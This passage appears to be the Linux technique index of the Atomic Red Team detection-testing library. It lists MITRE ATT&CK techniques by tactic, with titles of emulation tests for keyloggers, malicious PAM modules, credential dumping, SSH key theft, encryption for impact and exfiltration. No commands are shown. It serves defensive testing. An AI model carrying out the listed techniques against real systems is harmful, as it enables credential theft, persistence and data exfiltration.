- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- Atomic Test #4: Make and modify capabilities of a binary [linux]
- Atomic Test #5: Provide the SetUID capability to a file [linux]
- Atomic Test #6: Do reconnaissance for files that have the setuid bit set [linux]
- Atomic Test #7: Do reconnaissance for files that have the setgid bit set [linux]
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1169 Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- Atomic Test #3: Append to the system shell profile [linux]
- Atomic Test #4: Append commands user shell profile [linux]
- Atomic Test #5: System shell profile scripts [linux]
- Atomic Test #6: Create/Append to .bash_logout [linux]
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- [T1543.002 Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #2: At - Schedule a job [linux]
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #10: Login as nobody (Linux) [linux]
# credential-access
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
- Atomic Test #4: Bash session based keylogger [linux]
- Atomic Test #5: SSHD PAM keylogger [linux]
- Atomic Test #6: Auditd keylogger [linux]
- [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #5: SUDO Brute Force - Debian [linux]
- Atomic Test #6: SUDO Brute Force - Redhat [linux]
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.007 OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md)
- Atomic Test #1: Dump individual process memory with sh (Local) [linux]
- Atomic Test #2: Dump individual process memory with Python (Local) [linux]
- Atomic Test #3: Capture Passwords with MimiPenguin [linux]
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
- Atomic Test #9: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
- Atomic Test #10: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
- Atomic Test #11: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo [linux]
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552 Unsecured Credentials](../../T1552/T1552.md)
- Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos]
- T1139 Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1145 Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.003 Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #9: LaZagne.py - Dump Credentials from Firefox Browser [linux]
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- Atomic Test #5: Copy the users GnuPG directory with rsync [macos, linux]
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Find AWS credentials [macos, linux]
- Atomic Test #3: Extract passwords with grep [macos, linux]
- Atomic Test #6: Find and Access Github Credentials [macos, linux]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.002 Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #1: SSH Credential Stuffing From Linux [linux]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1081 Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md)
- Atomic Test #1: Access /etc/shadow (Local) [linux]
- Atomic Test #2: Access /etc/passwd (Local) [linux]
- Atomic Test #3: Access /etc/{shadow,passwd} with a standard bin that's not cat [linux]
- Atomic Test #4: Access /etc/{shadow,passwd} with shell builtins [linux]
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #2: System Owner/User Discovery [linux, macos]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #1: Enumerate all accounts (Local) [linux]
- Atomic Test #2: View sudoers access [linux, macos]
- Atomic Test #3: View accounts with UID 0 [linux, macos]
- Atomic Test #4: List opened files by user [linux, macos]
- Atomic Test #5: Show if a user account has ever logged in remotely [linux]
- Atomic Test #6: Enumerate users and groups [linux, macos]
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1007 System Service Discovery](../../T1007/T1007.md)
- Atomic Test #3: System Service Discovery - systemctl [linux]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
- Atomic Test #9: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
- Atomic Test #10: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
- Atomic Test #11: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo [linux]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #2: Network Share Discovery - linux [linux]
- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #4: Linux VM Check via Hardware [linux]
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
- Atomic Test #7: Hostname Discovery [linux, macos]
- Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
- Atomic Test #24: Linux List Kernel Modules [linux]
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on Linux [linux]
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #3: Nix File and Directory Discovery [macos, linux]
- Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #1: Process Discovery - ps [macos, linux]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #1: Permission Groups Discovery (Local) [macos, linux]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #1: Examine password complexity policy - Ubuntu [linux]
- Atomic Test #2: Examine password complexity policy - CentOS/RHEL 7.x [linux]
- Atomic Test #3: Examine password complexity policy - CentOS/RHEL 6.x [linux]
- Atomic Test #4: Examine password expiration policy - All Linux [linux]
- [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md)
- Atomic Test #3: Discover System Language with locale [linux]
- Atomic Test #4: Discover System Language with localectl [linux]
- Atomic Test #5: Discover System Language by locale file [linux]
- Atomic Test #6: Discover System Language by Environment Variable Query [linux]
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #4: Security Software Discovery - ps (Linux) [linux]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
- Atomic Test #12: Remote System Discovery - ip neighbour [linux]
- Atomic Test #13: Remote System Discovery - ip route [linux]
- Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]
- [T1046 Network Service Discovery](../../T1046/T1046.md)
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1492 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1489 Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1487 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.001 Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1531 Account Access Removal](../../T1531/T1531.md)
- Atomic Test #4: Change User Password via passwd [macos, linux]
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
- Atomic Test #1: Encrypt files using gpg (Linux) [linux]
- Atomic Test #2: Encrypt files using 7z (Linux) [linux]
- Atomic Test #3: Encrypt files using ccrypt (Linux) [linux]
- Atomic Test #4: Encrypt files using openssl (Linux) [linux]
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #3: Restart System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #4: Shutdown System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #5: Restart System via `reboot` - macOS/Linux [macos, linux]
- Atomic Test #6: Shutdown System via `halt` - Linux [linux]
- Atomic Test #7: Reboot System via `halt` - Linux [linux]
- Atomic Test #8: Shutdown System via `poweroff` - Linux [linux]
- Atomic Test #9: Reboot System via `poweroff` - Linux [linux]
# execution
- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1153 Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Command-Line Interface [macos, linux]
- Atomic Test #3: Harvest SUID executable files [linux]
- Atomic Test #4: LinEnum tool execution [linux]
- Atomic Test #5: New script file in the tmp directory [linux]
- Atomic Test #6: What shell is running [linux]
- Atomic Test #7: What shells are available [linux]
- Atomic Test #8: Command line scripts [linux]
- Atomic Test #9: Obfuscated command line scripts [linux]
- Atomic Test #10: Change login shell [linux]
- Atomic Test #11: Environment variable scripts [linux]
- Atomic Test #12: Detecting pipe-to-shell [linux]
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.006 Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md)
- Atomic Test #1: Execute shell script via python's command mode arguement [linux]
- Atomic Test #2: Execute Python via scripts (Linux) [linux]
- Atomic Test #3: Execute Python via Python executables (Linux) [linux]
- Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [linux]
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #2: At - Schedule a job [linux]
# initial-access
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1192 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.001 Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1193 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1194 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #10: Login as nobody (Linux) [linux]
# exfiltration
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- Atomic Test #2: Exfiltrate data HTTPS using curl linux [macos, linux]
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.003 Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux]
- Atomic Test #8: Python3 http.server [linux]
